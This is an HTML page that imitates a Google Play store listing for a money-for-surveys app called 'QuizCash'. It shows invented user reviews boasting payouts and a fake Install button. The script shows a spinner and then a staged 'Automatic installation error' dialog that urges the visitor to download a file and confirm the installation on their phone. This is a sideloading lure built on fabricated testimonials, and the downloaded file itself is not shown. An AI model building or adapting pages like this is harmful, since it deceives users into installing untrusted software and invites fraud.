<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Quiz Cash</title>
    <link rel="shortcut icon" href="favicon.png" type="image/x-icon">
    <script src="https://cdn.tailwindcss.com"></script>

    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap');

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        a {
            text-decoration: none;
        }

        body {
            font-family: 'Roboto', sans-serif;
            width: 100%;
            margin: 0 auto;
        }

        /* For Webkit browsers like Chrome/Safari */
        ::-webkit-scrollbar {
            display: none;
        }

        .main {
            max-width: 650px;
            margin: 0 auto;
            width: 100%;
        }

        /* The Modal (background) */
        .modal {
            display: none;
            /* Hidden by default */
            position: fixed;
            /* Stay in place */
            z-index: 1;
            /* Sit on top */
            left: 0;
            top: 0;
            width: 100%;
            /* Full width */
            height: 100%;
            /* Full height */
            overflow: auto;
            /* Enable scroll if needed */
            background-color: rgb(0, 0, 0);
            /* Fallback color */
            background-color: rgba(0, 0, 0, 0.2);
            /* Black w/ opacity */
        }

        /* Modal Content */
        .modal-content {
            /* 15% from the top and centered */
            padding: 20px;
            border-radius: 7.531px;
            background: #FFF;
            box-shadow: 1px 1px 6.025px 3px rgba(0, 0, 0, 0.25);
            width: 90%;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            /* Could be more or less, depending on screen size */
        }

        .spinner {
            animation: spin 1s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }

            100% {
                transform: rotate(360deg);
            }
        }
    </style>
</head>

<body>
    <div class="main px-7 py-8">
        <nav class="flex items-center justify-between">
            <a class=" w-[50%]"><img src="./img/play.svg" alt=""></a>
            <a class=" w-[20%]"><img src="./img/navs.svg" alt=""></a>

        </nav>
        <section>
            <div class="flex items-start gap-8 mt-[65px]">
                <img src="./img/prod.png" class="w-[20vw] max-w-[82px]" alt="">
                <div>
                    <h1 class="text-[32px]">QuizCash</h1>
                    <h2 class="text-xl text-[#01875F] font-bold">QuizCash Inc.</h2>
                </div>
            </div>
            <div class="mt-[42px] h-[52px] flex justify-center gap-7 sm:gap-9">
                <div class="flex flex-col items-center justify-between h-full">
                    <img class="mx-auto h-[32px]" src="./img/nav1.svg" alt="">
                    <p class="text-sm text-black opacity-30">1k reivews</p>
                </div>
                <div class="h-full w-[1.5px] bg-black opacity-20"></div>
                <div class="flex flex-col items-center justify-between h-full">
                    <img class="mx-auto h-[32px] max-w-[62px]" src="./img/nav2.svg" alt="">
                    <p class="text-sm text-black opacity-30">Downloads</p>
                </div>
                <div class="h-full w-[1.5px] bg-black opacity-20"></div>
                <div class="flex flex-col items-center justify-between h-full ">
                    <img class="mx-auto h-[32px] max-w-[22px]" src="./img/nav3.svg" alt="">
                    <p class="text-sm text-black opacity-30">Everyone</p>
                </div>
            </div>
            <div class="flex my-10 btn-active">
                <div
                    class="bg-[#01875F] w-full text-white rounded-full text-center py-3 text-xl max-h-[47px] flex justify-center items-center">
                    <span class="" id="install">
                        Install
                    </span>
                    <img src="./img/loader.svg" class="h-full spinner" id="loader" alt="loader">
                </div>
            </div>
            <div class="flex justify-center gap-4 sm:gap-9 w-full">
                <img src="./img/prod1.png" class="max-w-[30%]" alt="prod1">
                <img src="./img/prod2.png" class="max-w-[30%]" alt="prod1">
                <img src="./img/prod3.png" class="max-w-[30%]" alt="prod1">
            </div>
        </section>
        <section class="mt-10">
            <div class="flex justify-between items-center">
                <h2 class="text-2xl opacity-80">About this app</h2>
                <a class="">
                    <img src="./img/right.svg" alt="right">
                </a>
            </div>
            <p class="mt-7">Quiz Cash is a revolutionary mobile app that allows you to earn money by participating in
                surveys and quizzes.</p>
            <div class="mt-6 flex items-center gap-4">
                <a class="">
                    <div class="text-[#686868] text-sm p-1.5 ring-2 ring-[#DADCE0] rounded-xl">Quiz mobil</div>
                </a><a class="">
                    <div class="text-[#686868] text-sm p-1.5 ring-2 ring-[#DADCE0] rounded-xl">Quiz mobil</div>
                </a><a class="">
                    <div class="text-[#686868] text-sm p-1.5 ring-2 ring-[#DADCE0] rounded-xl">Quiz mobil</div>
                </a>
            </div>
        </section>
        <section class="mt-10">
            <div class="flex justify-between items-center">
                <h2 class="text-2xl opacity-80">About this app</h2>
                <a class="">
                    <img src="./img/right.svg" alt="right">
                </a>
            </div>
            <div class=" mt-7">
                <img src="./img/rate.svg" alt="">
            </div>
        </section>
        <section class="mt-16 space-y-11">
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava1.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Revan</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate1.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">10.11.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">Received the money, thank you for your app, no cheating.There's
                    nothing better than QuizCash</p>
            </div>
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava2.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Erin Baker</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate2.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">09.11.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">Withdrawn on the card 350$ for a day. Surveys are not very difficult,
                    but there are not as many as I would like.</p>
            </div>
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava3.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Teena Colette</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate3.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">01.11.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">I'm SHOCKED I just got an award for surveys. $200 is already on my
                    card. </p>
            </div>
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava4.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Alex460</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate3.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">25.10.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">I've had the app for a month now, add more surveys.I wish you success
                </p>
            </div>
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava5.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Scott Windsland</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate2.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">13.10.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">Received $600 dollars. I recommend it</p>
            </div>
            <div>
                <div class="flex items-center gap-5">
                    <img src="./img/ava6.png" alt="ava1" class="w-[45px] h-[45px] ">
                    <h3 class="text-lg opacity-80 font-medium">Hank</h3>
                </div>
                <div class="flex items-center gap-3 mt-3">
                    <img src="./img/rate3.svg" alt="ava1" class=" ">
                    <h3 class="text-sm opacity-80 font-medium">11.10.2023</h3>
                </div>
                <p class="text-lg opacity-80 mt-2">I will recommend you to all my friends, I'm thinking of quitting my
                    job to spend more time on surveys</p>
            </div>
        </section>
        <section class="text-center text-sm opacity-90 font-medium space-y-3 mt-7">
            <a class="">Google Play's return policy</a>
            <div class="flex justify-between items-center gap-3">
                <a class="">Cookie Policy</a>
                <a class="">User Agreement</a>
                <a class="">Privacy Policy</a>
            </div>
        </section>
        <div id="myModal" class="modal">
            <!-- Modal content -->
            <div class="modal-content">
                <h2 class="font-medium text-xl">Automatic installation error</h2>
                <p class="text-[#979797] text-md mt-3">Open the installation file manually and confirm the installation
                    on your phone.</p>
                <div class="w-full flex justify-end mt-3">
                    <a href="./filename.pdf" download class="text-[#2571F0] text-xl font-medium">Download</a>
                </div>
            </div>
        </div>
    </div>
    <script>
        // Get the modal
        var modal = document.getElementById("myModal");

        // Get the install span and the loader image
        var installSpan = document.getElementById("install");
        var loaderImg = document.getElementById("loader");

        // Initially hide the loader
        loaderImg.style.display = 'none';

        // Get all elements with class="btn-active" and attach a click event listener to them
        var btns = document.querySelectorAll('.btn-active');
        btns.forEach(function (btn) {
            btn.onclick = function () {
                // Hide the install span and show the loader
                installSpan.style.display = 'none';
                loaderImg.style.display = 'block';

                // After a short delay, display the modal
                setTimeout(function () {
                    modal.style.display = "block";
                }, 1800); // This timeout is set to 500ms. Adjust as needed.
            }
        });

        // When the user clicks anywhere outside of the modal, close it
        window.onclick = function (event) {
            if (event.target == modal) {
                modal.style.display = "none";

                // When closing the modal, hide the loader and show the install span again
                installSpan.style.display = 'block';
                loaderImg.style.display = 'none';
            }
        }


    </script>
</body>

</html>